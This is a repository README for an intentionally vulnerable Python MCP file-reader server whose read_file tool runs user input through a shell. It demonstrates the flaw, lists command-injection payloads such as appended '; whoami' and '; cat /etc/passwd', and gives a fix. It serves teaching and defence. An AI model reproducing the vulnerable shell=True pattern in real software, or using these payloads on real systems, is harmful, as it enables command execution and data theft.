Command Injection Vulnerability in MCP File Reader

This repository demonstrates a critical command injection vulnerability in a Python MCP (Model Context Protocol) server implementation. The vulnerability allows attackers to execute arbitrary shell commands on the host system by manipulating the file path parameter.

The Vulnerability

The vulnerability exists in the read_file function which is intended to read files from a "safe" directory but contains a dangerous implementation flaw:

command = f"cat {file_name}"
result = subprocess.check_output(command, shell=True, stderr=subprocess.STDOUT)

This code is vulnerable because:

1. It uses shell=True which invokes a shell to execute the command
2. It directly interpolates user input (file_name) into the command string without proper sanitization
3. It performs only superficial validation on the input path

A simple semantic difference between using quotes around the filename ('file_name') and not using quotes (file_name) exposes the entire system to command execution.

Installation

Prerequisites

• Python 3.12 or higher
• MCP library version 1.6.0

Setup

1. Clone this repository:

   git clone https://github.com/Eliran79/Vulnerable-file-reader-server.git
   cd Vulnerable-file-reader-server
   

2. Install the MCP server:

   mcp install main.py
   

3. Configure Claude Desktop to use your MCP server by editing ~/.config/claude-desktop/claude_desktop_config.json:

   {
     "mcpServers": {
       "file-reader": {
         "command": "/ABSOLUTE/PATH/TO/uv",
         "args": [
           "--directory",
           "/data/git/file_reader_server",
           "/usr/bin/uv",
           "run,--with,mcp,mcp,run,main.py"
         ]
       }
     }
   }
   

   Be sure to replace /ABSOLUTE/PATH/TO/uv with the actual path to your uv executable and adjust the directory path if needed.

4. Start the MCP server in development mode:

   mcp dev main.py
   

Demonstration

1. In a separate terminal, install and run the MCP inspector:

   pip install mcp-inspector
   mcp-inspector
   

2. Connect to the server in the MCP Inspector GUI:

   • Set Transport Type to "STDIO"
   • Set Command to: run --with mcp run main.py
   • Click "Restart"

3. Exploit the vulnerability:

   • Go to the "Tools" tab
   • Find the "read_file" tool
   • In the "file_name" field, enter:

     /tmp/safe/test.txt; whoami
     

   • Click "Run Tool"

4. You should see the contents of test.txt followed by your username, demonstrating successful command execution.

Additional Exploitation Examples

Here are more command injection payloads to try:

/tmp/safe/test.txt; id
/tmp/safe/test.txt; ls -la /etc
/tmp/safe/test.txt; cat /etc/passwd
/tmp/safe/test.txt; echo $(hostname)
/tmp/safe/test.txt; find / -name "*.conf" 2>/dev/null | head -5

Proper Fix

To fix this vulnerability, never use shell=True with user-provided input. Instead:

# SECURE: Use a list of arguments instead of shell=True
result = subprocess.check_output(['cat', file_name], shell=False)

# OR, if shell=True is necessary, properly quote the argument:
import shlex
result = subprocess.check_output(f"cat {shlex.quote(file_name)}", shell=True)

# AND perform proper path validation:
import os
safe_dir_resolved = os.path.abspath(SAFE_DIRECTORY)
requested_path_resolved = os.path.abspath(file_name)
if not requested_path_resolved.startswith(safe_dir_resolved):
    return f"Error: Access denied. Path traversal attempt detected."

Warning

⚠️ FOR EDUCATIONAL PURPOSES ONLY: This implementation contains deliberate security vulnerabilities. Never use this code in a production environment or on any system that contains sensitive information.